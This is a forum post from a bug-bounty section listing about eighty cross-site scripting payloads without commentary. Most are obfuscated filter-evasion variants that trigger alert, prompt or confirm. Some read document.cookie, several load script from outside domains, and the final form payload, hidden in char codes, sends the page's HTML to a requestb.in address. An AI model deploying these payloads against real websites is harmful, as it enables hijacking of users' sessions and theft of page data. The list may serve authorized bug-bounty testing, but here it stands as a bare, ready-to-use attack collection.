BugBounty Main Payloads XSS
Payloads 1

Calificación:
  • 0 voto(s) - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5
Modo compacto
Payloads 1
admin Sin conexión
Administrator
*******
Mensajes: 14
Temas: 12
Registro en: Nov 2022
Reputación: 0
#1
11-30-2022, 04:27 PM (Última modificación: 11-30-2022, 04:27 PM por admin.)
Código:
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<embed src=/x//alert(1)><base href="javascript:\
https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>
</script><script src=/ñ.xyz>
<script src=//u00f1.xyz>
†‡•<img src=a onerror=javascript:alert('hacked')>…‰€
< and >
<script>prompt(1)</script>
<script>confirm(1)</script>
<script> var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk=')); </script>
<script> var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk=')); /script>
<script> var fn=window[atob('ZXZhbA==')]; fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script>
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>
<script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>
<script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script>
<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch mport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>
<script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script>
<script>Array.from`${eval}alert\`1\``</script>
<script>Array.from([1],alert)</script>
<script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u>
<videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script>
<script>x=new class extends Function{}('alert(1)'); x=new x;</script>
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>
<frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
<script>alert(1)//
<script>alert(1)<!–
http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
</ScRiPt><svg onload=alert(1)
</ScRiPt><svg onload=alert(1)%20
</ScRiPt><svg onload=prompt(1)%20
asd%27%3Balert%28%27XSS%27%29%3B%27
%3C%68%31%3E%54%68%69%73%20%69%73%20%61%20%74%65%73%74%3C%2F%68%31%3E
<script>alert(document.cookie)</script><
javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));
javascript:eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<img src='nonexistant' onerror='eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))' />
\uFE64%\uFF1Cscript/src=//...?
"><img src=x onerror=alert(document.domain)>
<%<script/src="//...?" class="badLink"
<form action="javasc
ript:eval(String.fromCharCode(118,97,114,32,109,97,114,107,117,112,61,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,46,105,110,110,101,114,72,84,77,76,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,115,122,54,113,104,97,115,122,63,116,101,120,116,61,34,43,101,110,99,111,100,101,85,82,73,40,109,97,114,107,117,112,41,46,115,117,98,115,116,114,105,110,103,40,48,44,55,48,48,41))"><button>Click</button></form>
Buscar
Responder


Salto de foro:


Usuarios navegando en este tema: 1 invitado(s)